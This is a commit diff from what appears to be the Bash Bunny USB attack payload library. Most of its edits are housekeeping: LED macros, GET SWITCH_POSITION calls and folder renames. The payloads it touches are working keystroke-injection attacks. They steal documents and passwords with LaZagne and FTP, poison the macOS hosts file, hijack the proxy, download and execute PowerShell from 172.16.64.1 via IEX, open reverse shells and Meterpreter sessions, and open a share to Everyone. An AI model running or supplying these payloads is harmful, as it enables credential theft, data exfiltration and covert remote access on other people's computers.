payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt
View File

@ -4,18 +4,18 @@
# Author: $irLurk$alot
# Version: 1.0
# Target: Windows
#
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn runs powershell script to copy move and extract data.
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED SETUP
GET SWITCH_POSITION
LED R 100
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
LED R B 100
LED ATTACK
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK ENTER
LED R G B
LED FINISH

11
payloads/library/exfiltration/ftp_exfiltrator/payload.txt
View File

@ -4,7 +4,7 @@
# Author: Nutt
# Version: 1.0
# Target: Windows
#
#
#Exfiltrates files from the users Documents folder
#FTP's all files/folders to a specified FTP site named by the victim hostname.
#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
@ -15,13 +15,12 @@
#Red............Failed - Need to work on
#Green..........Finished
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R B
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 1000
LED ATTACK
QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
QUACK ENTER
LED G
LED FINISH

13
payloads/library/exfiltration/usb_exfiltrator/e.cmd
View File

@ -6,6 +6,14 @@ REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
@ -19,11 +27,12 @@ REM /E Copies directories and subdirectories, including empty ones.
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
)
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit
@exit

4
payloads/library/exfiltration/usb_exfiltrator/payload.txt
View File

@ -6,12 +6,12 @@
# Target: Windows XP SP3+
# Props: Diggster, IMcPwn
# Category: Exfiltration
#
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies documents to the loot folder on the Bash Bunny.
#
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"

13
payloads/library/general/ExecutableInstaller/payload.txt
View File

@ -4,22 +4,19 @@
# Author: IMcPwn
# Version: 1.0
# Target: Windows 7+
#
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
# using the --startup parameter. Change these settings inside of e.cmd.
#
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R
LED SETUP
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK ENTER
# Green LED for finished
LED G
LED FINISH

11
payloads/library/general/Proxy_Interceptor/payload.txt
View File

@ -19,10 +19,12 @@ LED R 50
#Set ATTACKMODE to HID and Storage to be able to transfer the certificate
ATTACKMODE HID STORAGE
#Import Bunny Helpers
source bunny_helpers.sh
#Start of Script
LED SETUP
GET SWITCH_POSITION
LED ATTACK
#Start of Script
Q DELAY 6000
Q GUI r
Q DELAY 100
@ -39,6 +41,7 @@ Q STRING cd \$absPath
Q ENTER
Q DELAY 500
LED ATTACK
#Set the proxy in the internet settings in the registry (For IE and Chrome).
Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')"
Q ENTER
@ -62,4 +65,4 @@ Q DELAY 500
Q STRING EXIT
Q ENTER
sync
LED R B 100
LED FINISH

0
payloads/library/general/Windows NIC Sharing/p.ps1 → payloads/library/general/Windows_NIC_Sharing/p.ps1
View File

6
payloads/library/general/Windows NIC Sharing/payload.txt → payloads/library/general/Windows_NIC_Sharing/payload.txt
View File

@ -23,7 +23,7 @@
# Sharing is caring
# Right-Click Ineternet interface click on
# "Properties" and select "Sharing" tab
#
#
# From "Sharing" tab check
# "Allow other netwrk usrs 2 connect... thru dis connection"
# Select the Bash Bunny Gadget and hit "OK"
@ -34,9 +34,11 @@
# Set the IPv4=172.16.64.64 and Subnet=24-bit
# Hit all the OKs
GET SWITCH_POSITION
# Or we could just have the Bash Bunny do all the work...
LED SETUP
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
SWITCHDIR=/root/udisk/payloads/$(SWITCH_POSITION)
# HID Attack Starts
ATTACKMODE HID

0
payloads/library/general/Windows NIC Sharing/readme.md → payloads/library/general/Windows_NIC_Sharing/readme.md
View File

0
payloads/library/general/Windows NIC Sharing/server.py → payloads/library/general/Windows_NIC_Sharing/server.py
View File

9
payloads/library/phishing/dns_poisoning_mac/README.md Normal file
View File

@ -0,0 +1,9 @@
# DNS Poisoning Attack Mac
## Description
Redirects a domain to a set IP adres by changing the hosts file.
## Configuration
Change the domain you want to redirect and the IP you want to direct it to.

23
payloads/library/phishing/dns_poisoning_mac/payload.txt Normal file
View File

@ -0,0 +1,23 @@
#Title: DNS Poisoning Mac
#Description: Attacks the host file to redirect a website of your chosing for a given domain
#Author: thehappydinoa
#Target: OS X
LED R 200
ATTACKMODE HID
LED STAGE1
Q DELAY 400
Q GUI SPACE
Q DELAY 300
Q STRING terminal
Q DELAY 200
Q ENTER
Q DELAY 400
Q STRING 'echo 10.1.1.0 test.com>>/etc/hosts'
Q DELAY 50
Q ENTER
Q STRING exit
Q ENTER
LED FINISH

71
payloads/library/prank/RickRoll/payload.txt
View File

@ -1,34 +1,37 @@
#!/bin/bash
#
# Title: RickRoll Prank
# Author: illwill
# Version: 0.1
#
#
# Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes
# Blue...............Running Powershell / Waiting for WebServer to start
# White..............WebServer started starting the rickroll
# Green..............RickRoll Started, Safe to pull
LED B 200
ATTACKMODE HID
Q GUI r
Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\""
Q DELAY 300
Q ENTER
ATTACKMODE RNDIS_ETHERNET
source bunny_helpers.sh
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
cd $payload_dir
LED R G B 200
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
pid=$!
while ! nc -z localhost 80; do sleep 0.2; done
sleep 3
LED G 200
kill -9 $pid
exit
#!/bin/bash
#
# Title: RickRoll Prank
# Author: illwill
# Version: 0.1
#
#
# Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes
# Blue...............Running Powershell / Waiting for WebServer to start
# White..............WebServer started starting the rickroll
# Green..............RickRoll Started, Safe to pull
LED SETUP
GET SWITCH_POSITION
LED STAGE1
ATTACKMODE HID
Q GUI r
Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\""
Q DELAY 300
Q ENTER
LED STAGE2
ATTACKMODE RNDIS_ETHERNET
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
cd $payload_dir
LED ATTACK
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
pid=$!
while ! nc -z localhost 80; do sleep 0.2; done
sleep 3
LED FINISH
kill -9 $pid
exit

13
payloads/library/prank/macDesktop/macWallpaper.sh
View File

@ -1,25 +1,26 @@
pid=$$
touch /tmp/$pid
cd /tmp/
for (( i=0; i < 5; ++i ))
do
if [ ! -e /tmp/1.jpg ]; then
wget "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg" -O "/tmp/1.jpg";
curl -0 1.jpg "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg";
fi
if [ ! -e /tmp/2.jpg ]; then
wget "http://wallpapersafari.com/download/rzbCmJ/" -O "/tmp/2.jpg";
curl -0 2.jpg "http://wallpapersafari.com/download/rzbCmJ/";
fi
if [ ! -e /tmp/3.jpg ]; then
wget "https://images3.alphacoders.com/152/152507.jpg" -O "/tmp/3.jpg";
curl -0 3.jpg "https://images3.alphacoders.com/152/152507.jpg";
fi
if [ ! -e /tmp/4.jpg ]; then
wget "https://images3.alphacoders.com/152/152475.jpg" -O "/tmp/4.jpg";
curl -0 4.jpg "https://images3.alphacoders.com/152/152475.jpg";
fi
if [ ! -e /tmp/5.jpg ]; then
wget "http://fanaru.com/my-little-pony-friendship-is-magic/image/56392-my-little-pony-friendship-is-magic-rarity-lineart.png" -O "/tmp/5.jpg";
curl -0 5.jpg "http://fanaru.com/my-little-pony-friendship-is-magic/image/56392-my-little-pony-friendship-is-magic-rarity-lineart.png";
fi
let number="$RANDOM % 5 + 1 | bc"
@ -31,7 +32,7 @@ do
killall Dock
let time="$RANDOM % 18000 + 2700 | bc"
echo $time
sleep $time
sleep $time
done
rm /tmp/1.jpg /tmp/2.jpg /tmp/3.jpg /tmp/4.jpg /tmp/5.jpg /tmp/$pid

1
payloads/library/prank/win93/payload.txt
View File

@ -78,7 +78,6 @@ if [ "$OS" = "MAC" ]; then
RUN OSX "terminal"
QUACK STRING "open \"http://www.windows93.net\" && osascript -e \"sleep 3;ccf;\";"
elif [ "$OS" = "LINUX" ]; then
DUCKY_LANG fr
RUN UNITY "xterm"
QUACK STRING "chromium-browser --start-fullscreen --incognito --new-window http://www.windows93.net &; exit;"
QUACK ENTER

30
payloads/library/recon/InfoGrabber/payload.txt
View File

@ -5,39 +5,19 @@
# Version: 1.0
# Target: Windows
# Creds: Hak5Darren for inspiration
#
#
# Executes run.ps1 which executes scripts that gets you information about
# the computer running and will also get wifi passwords
LED R B 100
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
#Check swith copied from bunny_helper
check_switch() {
switch1=`cat /sys/class/gpio_sw/PA8/data`
switch2=`cat /sys/class/gpio_sw/PL4/data`
switch3=`cat /sys/class/gpio_sw/PL3/data`
if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then
SWITCH_POSITION="switch1"
elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then
SWITCH_POSITION="switch2"
elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then
SWITCH_POSITION="switch3"
else
SWITCH_POSITION="invalid"
fi
}
check_switch
# Set your language here
QUACK SET_LANGUAGE no
LED ATTACK
QUACK GUI r
QUACK DELAY 200
# Open run and run the run.ps1 script in the Bashbunny
QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
QUACK ENTER
LED G
#Green means good to go
LED FINISH

12
payloads/library/recon/Link File analysis/payload.txt
View File

@ -1,12 +0,0 @@
LED R B 100
ATTACKMODE HID STORAGE
DUCKY_LANG gb
LED B
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED G FAST
#Green means good to go

13
payloads/library/Incident_Response/Link File analysis/payload.txt → payloads/library/recon/Link_File_analysis/payload.txt
View File

@ -1,12 +1,7 @@
LED R B 100
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
DUCKY_LANG gb
LED B
LED ATTACK
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED G FAST
#Green means good to go
LED FINISH

0
payloads/library/recon/Link File analysis/readme.md → payloads/library/recon/Link_File_analysis/readme.md
View File

0
payloads/library/recon/Link File analysis/run.ps1 → payloads/library/recon/Link_File_analysis/run.ps1
View File

20
payloads/library/recon/PrivEscChecker/payload.txt
View File

@ -15,10 +15,8 @@
# Green..............Found Possible Privilege Escalation
# Red................No Possible Privilege Escalation
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R 200
LED SETUP
GET SWITCH_POSITION
LOOTDIR=/root/udisk/loot/PrivEscChecker
mkdir -p $LOOTDIR
#cleanup any prior unfinished payloads
@ -26,7 +24,7 @@ rm $LOOTDIR/DONE
rm $LOOTDIR/OUTPUT
ATTACKMODE HID STORAGE
LED B 200
LED ATTACK
# wait 6 seconds for the storage to popup, then open powershell and get bunny drive letter
Q DELAY 6000
@ -57,7 +55,7 @@ Q STRING New-Item \$Bunny\\loot\\PrivEscChecker\\DONE -type file -force -value \
Q ENTER
Q DELAY 100
# Eject the USB Safely
# Eject the USB Safely
Q STRING \$Eject \= New-Object -comObject Shell.Application
Q ENTER
Q DELAY 100
@ -68,7 +66,7 @@ Q ENTER
sync
#remount the drive and check results
LED R B 200
LED CLEANUP
sleep 1
# Wait for the DONE file to be created so we know powershell is finished
LOOTDIR=/root/udisk/loot/PrivEscChecker
@ -84,7 +82,7 @@ rm -f $DONEFILE
# Check OUTPUT.txt for any missing patches
if grep -lq 'Appears Vulnerable' $LOOTDIR/$DIR/OUTPUT.txt; then
LED G 200
else
LED R
fi
LED FINISH
else
LED FAIL
fi

3
payloads/library/remote_access/LinuxReverseShell/payload.txt
View File

@ -17,6 +17,9 @@ RPORT=4444
# Start Setup
LED SETUP
# Gets Switch Position
GET SWITCH_POSITION
# Set Attack Mode
ATTACKMODE HID STORAGE

18
payloads/library/remote_access/NothingLess/payload.txt
View File

@ -4,18 +4,18 @@
# Author: StinkyBliss
# Version: 1.0
# Target: Windows
#
#
#
#
# Maps the file system and stores it in c:\users\tempa
# Shares a location to everyone and grants full security permissions to everyone
#
#
# For testing use: 'icacls "c:\Users" /remove:g Everyone /T' to remove the created security permissions
# To share a drive change the path in nl.cmd to c: remove the quotes
LED R 200
LED SETUP
GET SWITCH_POSITION
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED STAGE1
ATTACKMODE HID
@ -30,12 +30,12 @@ Q DELAY 1000
Q LEFT
Q ENTER
LED R G 200
LED STAGE2
ATTACKMODE HID STORAGE
# Start nl.cmd
Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\nl.cmd')"
Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\${SWITCH_POSITION}\nl.cmd')"
Q ENTER
# Wait for nl.cmd and exit
@ -45,4 +45,4 @@ Q ENTER
sync
LED G
LED FINISH

10
payloads/library/remote_access/USB_Intruder/payload.txt
View File

@ -17,12 +17,13 @@
#Green - Attack Completion
#Initialization - Setting AttackModes
LED W
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
#Initialization Completed
#Beginning of HID/STORAGE Phase
LED B 10
LED ATTACK
#Description::
Q DELAY 2000
Q GUI d
@ -61,7 +62,7 @@ Q DELAY 500
#End of HID/STORAGE Phase
#Cleanup
LED Y 100
LED CLEANUP
#Clears complete run history
Q GUI r
Q DELAY 500
@ -70,7 +71,6 @@ Q ENTER
#End of Cleanup
#Completion of script
LED G 100
sync
LED G
LED FINISH
#Completed

1
payloads/library/remote_access/Win_x64_JS_Rev_Meter/payload.txt
View File

@ -3,7 +3,6 @@ LED G
REM set attackmode to HID device
ATTACKMODE HID
REM set keyboard
DUCKY_LANG us
REM open run menu
Q GUI r
Q DELAY 1000

13
payloads/library/remote_access/WindowsMeterpreterStaged/payload.txt
View File

@ -29,20 +29,19 @@
# Red: failure to load dependency ducky script
#
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID
LED R G 200
LANGUAGE='us'
source bunny_helpers.sh
LED ATTACK
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky.txt" ]; then
QUACK ${SWITCH_POSITION}/windows-staged-meterpreter.txt
LED G
LED FINISH
else
LED R
LED FAIL
echo "Unable to load dwindows-staged-meterpreter.txt" >> /root/debuglog.txt
exit 1
fi

11
payloads/library/sFTP Directory Grabber/payload.txt
View File

@ -6,7 +6,7 @@
# Version: 1.0
# Target: Windows 7+
# NOTICE: HAK5 is not responsible for the execution of 3rd party binaries!
#
#
# Copies psFTP.exe from the Bash Bunny USB Mass Storage root directory to %TEMP% and then executes with parameters in the e.cmd.
# e.cmd is excuted invisibly using i.vbs
# which in turn copies psftp.exe from the root of the Bash Bunny and then executes it
@ -16,16 +16,15 @@
# SET lootfrom=c:\users\username\documents
# SET looto=/loot
#
#IMPORTANT:
#IMPORTANT:
#To Download psftp.exe please use one of the links below:
#32-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w32/psftp.exe
#64-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w64/psftp.exe
#Once downloaded, please copy psFTP.exe to the root of the bash bunny before attempting to use this payload.
#
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
@ -33,4 +32,4 @@ QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'pa
QUACK ENTER
# Green LED for finished
LED G
LED FINISH